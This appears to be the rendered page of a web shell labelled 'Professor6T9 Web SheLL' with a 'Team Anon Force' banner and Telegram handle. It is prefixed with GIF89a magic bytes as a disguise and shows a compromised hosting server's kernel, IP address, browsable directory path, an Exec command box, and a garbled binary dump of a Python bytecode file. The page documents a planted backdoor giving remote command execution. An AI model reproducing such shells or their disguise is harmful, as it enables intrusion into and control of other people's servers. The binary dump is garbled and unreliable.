GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
proc
/
self
/
root
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
astroid
/
brain
/
__pycache__
[ HOME ]
Exec
Submit
brain_numpy_ma.cpython-311.pyc
� �|oi� � �^ � d Z ddlmZ ddlmZ ddlmZ d� Z e e� � de� � dS )z"Astroid hooks for numpy ma module.� )�register_module_extender��parse)�AstroidManagerc � � t d� � S )z} Infer the call of various numpy.ma functions. :param node: node to infer :param context: inference context z� import numpy.ma def masked_where(condition, a, copy=True): return numpy.ma.masked_array(a, mask=[]) def masked_invalid(a, copy=True): return numpy.ma.masked_array(a, mask=[]) r � � �n/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/astroid/brain/brain_numpy_ma.py�numpy_ma_transformr s � � � � � � r znumpy.maN)�__doc__�astroid.brain.helpersr �astroid.builderr �astroid.managerr r r r r �<module>r sx �� )� (� :� :� :� :� :� :� !� !� !� !� !� !� *� *� *� *� *� *�� � �&